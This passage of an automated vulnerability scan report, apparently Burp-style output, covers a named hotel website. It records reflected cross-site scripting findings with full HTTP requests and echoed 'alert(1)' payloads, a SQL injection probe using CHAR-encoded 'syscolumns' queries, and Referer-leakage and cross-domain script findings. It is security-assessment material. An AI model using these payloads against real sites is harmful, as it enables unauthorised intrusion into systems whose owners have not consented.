User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ASP.NET_SessionId=zjexnwjnvoyu4ommbyh5sz55; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 181521

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUKLTI3NDU5NTE1NA9kFgJmD2QWAgIDD2QWAmYPZBYKAgcPFgIeBFRleHQFjBM8dHI%2bICAgIDx0ZCBjb2xzcGFuPSI0IiBhbGlnbj0ibGVmdCIgdmFsaWduPSJ0b3AiPjxpbWcgc3JjPSIuLi9p
...[SNIP]...
%2c61561%2c59433%2c44081%2c70985%2c61599%2c61580%2c60801%2c59566%2c71365%2c64772%2c63613%2c63290%2c70206%2c63670%2c59471&ctl00$ContentPlaceHolder1$hdnTotalRecs=70&currentPage=0&newSearch=&city=&state=81c6a"%3balert(1)//c06c4acce6c&country=&spid=&hotelName=&selCity=&selState=ST&selCountry=AC&chkPreferences=67&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$txtEmail=Your+Email+Address&ctl00$ContentPlaceHold
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 03:01:57 GMT
Content-Length: 63443

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
<window.document.forms[0].selState.length;i++)
{
if(window.document.forms[0].selState.options[i].text == "81c6a";alert(1)//c06c4acce6c")
window.document.forms[0].selState.selectedIndex=i;
}
for (i=0;i<window.document.forms[0].selCity.length;i++)
{
if(window.document.forms[0].se
...[SNIP]...

2.4. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb7c3"%3balert(1)//1494a535ac7 was submitted in the city parameter. This input was echoed as eb7c3";alert(1)//1494a535ac7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /summit/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; ASP.NET_SessionId=hcbf1efvrdp3ct45ry3y3uaw
Accept-Encoding: gzip, deflate
Content-Length: 143941

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCQL%2fjIqQDgKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDWjUU89HhnZJSqRDvztEI2DzNkmE%3d&__PREVIOUSPAGE=Gs-9a-FcNvUcFPrAU2z3ay
...[SNIP]...
cml0ZSgic3BlY2lhbDAzIik7PC9zY3JpcHQ%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUqY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRidG5TcGVjaWFsU2VhcmNo5ZgvfGJ5k5Z4jQoGax8nDxg86rg%3d&chkPreferences=29&city=eb7c3"%3balert(1)//1494a535ac7&country=&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$hdnCity=&ctl00$ContentPlaceHolder1$hdnCountry=&ctl00$ContentPlaceHolder1$hdnPreferences=&ctl00$ContentPlaceHolder1$hdnPr
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 151125
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 20:12:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<window.document.forms[0].selCity.length;i++)
{
if(window.document.forms[0].selCity.options[i].text == "eb7c3";alert(1)//1494a535ac7")
window.document.forms[0].selCity.selectedIndex=i;
}
//-->
...[SNIP]...

2.5. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx [country parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The value of the country request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8bf5"%3balert(1)//1f3a2d1d5ea was submitted in the country parameter. This input was echoed as b8bf5";alert(1)//1f3a2d1d5ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /summit/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; ASP.NET_SessionId=hcbf1efvrdp3ct45ry3y3uaw
Accept-Encoding: gzip, deflate
Content-Length: 143941

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCQL%2fjIqQDgKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDWjUU89HhnZJSqRDvztEI2DzNkmE%3d&__PREVIOUSPAGE=Gs-9a-FcNvUcFPrAU2z3ay
...[SNIP]...
3BlY2lhbDAzIik7PC9zY3JpcHQ%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUqY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRidG5TcGVjaWFsU2VhcmNo5ZgvfGJ5k5Z4jQoGax8nDxg86rg%3d&chkPreferences=29&city=&country=b8bf5"%3balert(1)//1f3a2d1d5ea&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$hdnCity=&ctl00$ContentPlaceHolder1$hdnCountry=&ctl00$ContentPlaceHolder1$hdnPreferences=&ctl00$ContentPlaceHolder1$hdnPropertyIds
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 151034
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 20:27:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<window.document.forms[0].selCountry.length;i++)
{
if(window.document.forms[0].selCountry.options[i].text == "b8bf5";alert(1)//1f3a2d1d5ea")
window.document.forms[0].selCountry.selectedIndex=i;
}
for (i=0;i<window.document.forms[0].selState.length;i++)
{
if(window.document.forms[0]
...[SNIP]...

2.6. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx [state parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The value of the state request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b92f7"%3balert(1)//aef21e026be was submitted in the state parameter. This input was echoed as b92f7";alert(1)//aef21e026be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /summit/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; ASP.NET_SessionId=hcbf1efvrdp3ct45ry3y3uaw
Accept-Encoding: gzip, deflate
Content-Length: 143941

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCQL%2fjIqQDgKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDWjUU89HhnZJSqRDvztEI2DzNkmE%3d&__PREVIOUSPAGE=Gs-9a-FcNvUcFPrAU2z3ay
...[SNIP]...
tentPlaceHolder1$hdnSpecialId=&ctl00$ContentPlaceHolder1$hdnState=&ctl00$ContentPlaceHolder1$hdnTotalRecs=153&currentPage=0&HotelName=&newSearch=&selCity=ACAAA-XXX-1MX&selCountry=AC&selState=ST&state=b92f7"%3balert(1)//aef21e026be

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 151057
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 22:51:55 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<window.document.forms[0].selState.length;i++)
{
if(window.document.forms[0].selState.options[i].text == "b92f7";alert(1)//aef21e026be")
window.document.forms[0].selState.selectedIndex=i;
}
for (i=0;i<window.document.forms[0].selCity.length;i++)
{
if(window.document.forms[0].se
...[SNIP]...

3. SQL statement in request parameter previous next
There are 2 instances of this issue:

/sterling/special_offers/special_search_results.aspx
/summit/special_offers/special_search_results.aspx

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

3.1. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Request

POST /sterling/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ASP.NET_SessionId=zjexnwjnvoyu4ommbyh5sz55; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033
Accept-Encoding: gzip, deflate
Content-Length: 181646

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWCwLh%2b%2ba4BAKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDAtSenfEBAq2FnsUI4NFiVXYYSvLI2NlHrH8o2y%2bQIx0%3d&__PREVIOUSPAGE=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&__VIEWSTATE=%2fwEPDwUKLTI3NDU5NTE1NA9kFgJmD2QWAgIDD2QWAmYPZBYKAgcPFgIeBFRleHQFjBM8dHI%2bICAgIDx0ZCBjb2xzcGFuPSI0IiBhbGlnbj0ibGVmdCIgdmFsaWduPSJ0b3AiPjxpbWcgc3JjPSIuLi9pbWFnZXMvcG9pbnQuZ2l
...[SNIP]...

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 210
Content-Type: text/html; charset=utf-8
Location: /PHG/404.htm?aspxerrorpath=/sterling/special_offers/special_search_results.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:16:08 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fPHG%2f404.htm%3faspxerrorpath%3d%2fsterling%2fspecial_offers%2fspecial_search_results.aspx">here</a>.</h2>
</body
...[SNIP]...

3.2. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Request

POST /summit/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; ASP.NET_SessionId=hcbf1efvrdp3ct45ry3y3uaw
Accept-Encoding: gzip, deflate
Content-Length: 144040

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWCQL%2fjIqQDgKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDWjUU89HhnZJSqRDvztEI2DzNkmE%3d&__PREVIOUSPAGE=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&__VIEWSTATE=%2fwEPDwUJMTg0MTA0MDExD2QWAmYPZBYCAgEPZBYGZg9kFgICBw8WAh4EVGV4dAXgETx0cj48dGQgYWxpZ249ImxlZnQiIHZhbGlnbj0idG9wIj48aW1nIHNyYz0iLi4vaW1hZ2VzL3BvaW50LmdpZiIgYWx0PSIiIHdpZHRoPSIxM
...[SNIP]...

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 208
Content-Type: text/html; charset=utf-8
Location: /PHG/404.htm?aspxerrorpath=/summit/special_offers/special_search_results.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:19:20 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fPHG%2f404.htm%3faspxerrorpath%3d%2fsummit%2fspecial_offers%2fspecial_search_results.aspx">here</a>.</h2>
</body><
...[SNIP]...

4. Cross-domain Referer leakage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/PHG/404.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.sterlinghotels.com/PHG/404.htm?aspxerrorpath=/summit/special_offers_summit_specials.aspx

The response contains the following links to other domains:

http://www.hcareers.com/cjb/preferredhotelgroup
http://www.historichotels.org/
http://www.iprefer.com/
http://www.phgoffers.com/
http://www.preferredboutique.com/
http://www.preferredgolf.com/
http://www.preferredhotelgroup.com/
http://www.preferredhotelgroup.com/PHG/images/logo_group_img.gif
http://www.preferredhotelgroup.com/PHG/worldwide_presence/index.aspx
http://www.preferredhotelgroup.com/phg/contact_us/index.aspx
http://www.preferredhotelgroup.com/phg/corporate_responsibility/index.aspx
http://www.preferredhotelgroup.com/phg/directory/index.aspx
http://www.preferredhotelgroup.com/phg/groups_meetings/index.aspx
http://www.preferredhotelgroup.com/phg/preferred_services/become_a_member_hotel.aspx
http://www.preferredhotelgroup.com/phg/preferred_services/index.aspx
http://www.preferredhotelgroup.com/phg/press_center/index.aspx
http://www.preferredhotelgroup.com/phg/privacy_policy/index.aspx
http://www.preferredhotelgroup.com/phg/reservations/index.aspx
http://www.preferredhotelgroup.com/phg/security_policy/index.aspx
http://www.preferredhotelgroup.com/phg/sitemap/index.aspx
http://www.preferredhotelgroup.com/phg/special_offers/index.aspx
http://www.preferredhotelgroup.com/phg/travel_agents/index.aspx
http://www.preferredhotelgroup.com/phg/worldwide_presence/index.aspx
http://www.preferredhotelgroupmeetings.com/
http://www.preferredhotels.com/
http://www.preferredresidences.com/
http://www.summithotels.com/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /PHG/404.htm?aspxerrorpath=/summit/special_offers_summit_specials.aspx HTTP/1.1
Host: www.sterlinghotels.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 12 Feb 2010 21:32:13 GMT
Accept-Ranges: bytes
ETag: "806ccd72aacca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 21:35:09 GMT
Content-Length: 17703

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<td align="left" valign="top"><a href="http://www.preferredhotelgroup.com/phg/reservations/index.aspx" title="Reservations" onMouseOver="res.src='404_img/reservations_on.gif'" onMouseOut="res.src='404_img/reservations_off.gif'"></a>
...[SNIP]...
<td align="left" valign="top"><a href="http://www.phgoffers.com" title="Special Offers" onMouseOver="spe.src='404_img/special_offers_on.gif'" onMouseOut="spe.src='404_img/special_offers_off.gif'"><img src="404_img/special_offers_off.gif" alt="Special Offers" name="spe" width="83" height="7" border="0" id="spe" />
...[SNIP]...
<td align="left" valign="top"><a href="http://www.preferredhotelgroup.com/PHG/worldwide_presence/index.aspx" title="Find a Hotel" onMouseOver="fh.src='404_img/find_hotel_on.gif'" onMouseOut="fh.src='images/find_hotel_off.gif'"><img src="images/find_hotel_off.gif" alt="Special Offers" name="fh" width="68" height="7" border="0" id="fh" />
...[SNIP]...
<td align="left" valign="top"><a href="http://www.preferredhotelgroup.com/phg/press_center/index.aspx" title="Press Center" onMouseOver="pre.src='404_img/press_center_on.gif'" onMouseOut="pre.src='404_img/press_center_off.gif'"><img src="404_img/press_center_off.gif" alt="Press Center" name="pre" width="74" height="7" border="0" id="pre" />
...[SNIP]...
<td align="left" valign="top"><a href="http://www.hcareers.com/cjb/preferredhotelgroup" target="_blank" title="Careers" onMouseOver="car.src='404_img/careers_on.gif'" onMouseOut="car.src='404_img/careers_off.gif'"><img src="404_img/careers_off.gif" alt="Careers" name="car" width="45" height="7" border="0" id="car" />
...[SNIP]...
<td align="left" valign="top"><a href="http://www.preferredhotelgroup.com/phg/contact_us/index.aspx" title="Contact" onMouseOver="con.src='404_img/contact_on.gif'" onMouseOut="con.src='404_img/contact_off.gif'"><img src="404_img/contact_off.gif" alt="Contact" name="con" width="45" height="7" border="0" id="con" />
...[SNIP]...
<map name="Map"><area shape="rect" coords="26,26,207,102" href="http://www.preferredhotelgroup.com/">
</map>
...[SNIP]...
<li><a href="http://www.phgoffers.com">Special Offers</a>
...[SNIP]...
<li><a href="http://www.preferredhotelgroupmeetings.com">Groups & Meetings</a>
...[SNIP]...
<td align="left" valign="top" style="padding-top: 30px;"><img src="http://www.preferredhotelgroup.com/PHG/images/logo_group_img.gif" alt="" width="900" height="71" border="0" usemap="#logo_group" /></td>
...[SNIP]...
<td align="center" valign="top"><a href="http://www.preferredhotelgroup.com/phg/preferred_services/index.aspx" title="Preferred Services" class="footer">Preferred
Services</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/worldwide_presence/index.aspx" title="Worldwide Presence" class="footer">Worldwide
Presence</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/corporate_responsibility/index.aspx" title="Corporate Responsibility" class="footer">Corporate
Responsibility</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/groups_meetings/index.aspx" title="Groups and Meetings" class="footer">Groups
& Meetings</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/travel_agents/index.aspx" title="Travel Agents" class="footer">Travel
Agents</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/preferred_services/become_a_member_hotel.aspx" title="Become a Member Hotel" class="footer">Become
a Member Hotel</a><br />
<a href="http://www.preferredhotelgroup.com/phg/reservations/index.aspx" title="Reservations" class="footer">Reservations</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/special_offers/index.aspx" title="Special Offers" class="footer">Special
Offers</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/press_center/index.aspx" title="Press Center" class="footer">Press
Center</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.hcareers.com/cjb/preferredhotelgroup" target="_blank" title="Careers" class="footer">Careers</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/security_policy/index.aspx" title="Security Policy" class="footer">Security
Policy</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/privacy_policy/index.aspx" title="Privacy Policy" class="footer">Privacy
Policy</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/contact_us/index.aspx" title="Contact Us" class="footer">Contact
Us</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/sitemap/index.aspx" title="Sitemap" class="footer">Sitemap</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotelgroup.com/phg/directory/index.aspx" title="Hotel Directory" class="footer">Hotel
Directory</a>
...[SNIP]...
<td align="center" valign="top"><a href="http://www.preferredhotelgroup.com/" target="_blank" class="footer" title="Preferred Hotel Group...">Preferred Hotel Group...</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredhotels.com/" target="_blank" class="footer1" title="Preferred Hotels.. and Resorts">Preferred Hotels<span style="position: relative; top: -4px; font-size: 9px;">
...[SNIP]...
<img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredboutique.com/" target="_blank" class="footer" title="Preferred Boutique...">Preferred Boutique...</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.summithotels.com/" target="_blank" class="footer" title="Summit Hotels and Resorts...">Summit Hotels & Resorts...</a>
...[SNIP]...
<br />
<a href="http://www.historichotels.org/" target="_blank" class="footer" title="Historic Hotels of America...">Historic
Hotels of America...</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredresidences.com" target="_blank" class="footer" title="Preferred Residences...">Preferred
Residences...</a><img src="404_img/point.gif" alt="" width="14" height="8" border="0" /><a href="http://www.iprefer.com/" target="_blank" class="footer" title="I Prefer...">I
Prefer...</a><img src="404_img/point.gif" alt="" width="14" height="1" border="0" /><a href="http://www.preferredgolf.com/" target="_blank" class="footer" title="Preferred Golf Club...">Preferred
Golf Club...</a>
...[SNIP]...
<map name="logo_group" id="logo_group">
<area shape="rect" coords="14,9,163,65" href="http://www.preferredhotelgroup.com/" alt="Preferred Hotel Group..." target="_blank" title="Preferred Hotel Group..." />
<area shape="rect" coords="206,17,298,50" href="http://www.preferredhotels.com/" alt="Preferred Hotels.. and Resorts" target="_blank" title="Preferred Hotels.. and Resorts" />
<area shape="rect" coords="321,18,425,53" href="http://www.preferredboutique.com/" alt="Preferred Boutique..." target="_blank" title="Preferred Boutique..." />
<area shape="rect" coords="438,25,516,50" href="http://www.summithotels.com/" alt="Summit Hotels and Resorts..." target="_blank" title="Summit Hotels and Resorts..." />
<area shape="rect" coords="541,24,622,51" href="http://www.sterlinghotels.com/sterling/index.aspx" target="_blank" alt="Sterling Hotels..." title="Sterling Hotels..." />
<area shape="rect" coords="650,20,749,55" href="http://www.historichotels.org/" target="_blank" alt="Historic Hotels of America..." title="Historic Hotels of America..." />

<area shape="rect" coords="795,17,885,49" href="http://www.preferredresidences.com" target="_blank" alt="Preferred Residences..." title="Preferred Residences..." />
</map>
...[SNIP]...

5. Cross-domain script include previous next
There are 280 instances of this issue:

/sterling/index.aspx
/sterling/index.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
/sterling/special_offers/special_search_results.aspx
